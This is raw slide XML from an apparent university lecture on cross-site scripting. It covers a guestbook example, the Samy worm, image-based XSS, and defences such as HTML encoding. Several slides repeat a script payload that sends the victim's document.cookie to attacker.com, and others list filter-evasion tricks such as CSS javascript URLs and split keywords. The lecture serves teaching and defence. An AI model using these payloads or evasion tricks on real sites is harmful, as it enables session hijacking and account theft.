              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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 = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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; &lt;/script&gt;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None/>
            </a:pP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Consequence: </a:t>
            </a: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Victim’s Cookie stolen by attacker.com;</a:t>
            </a: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Possible sensitive private information;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"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XSS Vulnerable code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8128000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 bwMode="auto">
          <a:xfrm>
            <a:off x="251521" y="3068960"/>
            <a:ext cx="1656184" cy="86409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835696" y="3789040"/>
            <a:ext cx="1224136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203849" y="4293097"/>
            <a:ext cx="4104456" cy="64633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dirty="0" smtClean="0"/>
              <a:t>old messages stored in database in the server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835696" y="2780928"/>
            <a:ext cx="129614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707905" y="2924945"/>
            <a:ext cx="3096344" cy="64633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dirty="0" smtClean="0"/>
              <a:t>user can leave a new message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140968"/>
            <a:ext cx="8649189" cy="504056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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://www-sop.inria.fr/members/Tamara.Rezk/teaching/caspar/web3.tar.gz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Stored XSS attack on example 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31462" y="1346929"/>
            <a:ext cx="9112538" cy="487418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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker leaves a message like this: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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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 = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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; &lt;/script&gt; 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The message is stored in the guestbook database and displayed  (executed!) for every new client of the guestbook.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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Consequence: 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Many victims’ cookies stolen by attacker.com;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Possible sensitive private information;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"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Stored XSS - Example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" name="Rectangle à coins arrondis 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371457" y="2286478"/>
            <a:ext cx="915258" cy="9137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0" hangingPunct="0"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6" name="Rectangle à coins arrondis 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105424" y="5257179"/>
            <a:ext cx="913828" cy="91516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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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7" name="Rectangle à coins arrondis 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086100" y="2210454"/>
            <a:ext cx="915258" cy="91373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0" hangingPunct="0"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9" name="Rectangle à coins arrondis 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371457" y="5181154"/>
            <a:ext cx="915258" cy="91516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0" hangingPunct="0"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5105424" y="2210454"/>
            <a:ext cx="913828" cy="91373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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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286716" y="3200209"/>
            <a:ext cx="2818708" cy="2056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325292" y="2514553"/>
            <a:ext cx="685013" cy="1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438306" y="2514553"/>
            <a:ext cx="2514099" cy="1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>
            <a:off x="2514100" y="2820085"/>
            <a:ext cx="2438305" cy="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438305" y="2972135"/>
            <a:ext cx="2591324" cy="2285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9" name="TextBox 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010305" y="1828896"/>
            <a:ext cx="117210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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Database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4590" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4952405" y="1600822"/>
            <a:ext cx="1364468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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Guestbook </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>server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4591" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="991053" y="1828896"/>
            <a:ext cx="1415764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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Benign user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24592" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="913829" y="4725006"/>
            <a:ext cx="165942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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Malicious user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24593" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105424" y="4801030"/>
            <a:ext cx="151842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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Attacker.com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1980676" y="3885866"/>
            <a:ext cx="2667119" cy="100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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Add entry:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; 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6019252" y="3200209"/>
            <a:ext cx="2515529" cy="73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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; </a:t>
            </a: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276339" y="2132995"/>
            <a:ext cx="17107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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Get all entries</a:t>
            </a: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2438306" y="2972134"/>
            <a:ext cx="2514099" cy="73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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>; &lt;/script&gt; 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352133" y="3733816"/>
            <a:ext cx="169789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 eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Secret cookies</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋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10800000">
            <a:off x="6248067" y="2820085"/>
            <a:ext cx="686444" cy="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1" grpId="0"/>
      <p:bldP spid="31" grpId="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="32" grpId="1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MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(Samy worm)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6246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686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Users can post HTML on their pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MySpace.com ensures HTML contains no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>…  but can do Javascript within CSS tags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pP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&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>And can hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“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java\nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>With careful javascript hacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy worm infects anyone who visits an infected MySpace page   …    and adds Samy as a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy had millions of friends within 24 hours.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715000" y="6467475"/>
            <a:ext cx="31892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90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://namb.la/popular/tech.html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XSS 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Yahoo Mail (2013)</a:t>
            </a:r>
          </a:p>
          <a:p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 smtClean="0"/>
              <a:t>(2013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/>
              <a:t>+1 button (2012)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Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (2012,2011,2010)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XSS using images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2667000"/>
            <a:ext cx="4724400" cy="1905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2662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2000" y="1676400"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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smtClean="0"/>
              <a:t>Suppose   pic.jpg   on web server contains HTML !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> request for    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      &lt;html&gt;  fooled ya   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IE will render this as HTML    (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Consider photo sharing sites that support image uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>What if attacker uploads an “image” that is a script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="28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data validation and filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3174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trust client-side data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Best: allow only what you expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Remove/encode special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many encodings, special chars!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 filtering / encoding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Remove / encode (X)HTML special chars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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &lt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; for &gt;, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> for “ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Allow only safe commands (e.g., no &lt;script&gt;…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: `filter evasion` tricks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See XSS Cheat Sheet for filter evasion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E.g., if filter allows quoting (of &lt;script&gt; etc.), use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    malformed quoting: &lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)…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Or: (long) UTF-8 encode, or…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Caution: Scripts not only in &lt;script&gt;!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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-494828" y="50146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  <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PHP:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  		&amp; 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 &amp;amp;	" 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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;      '  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&amp;#039;       	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>		&lt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
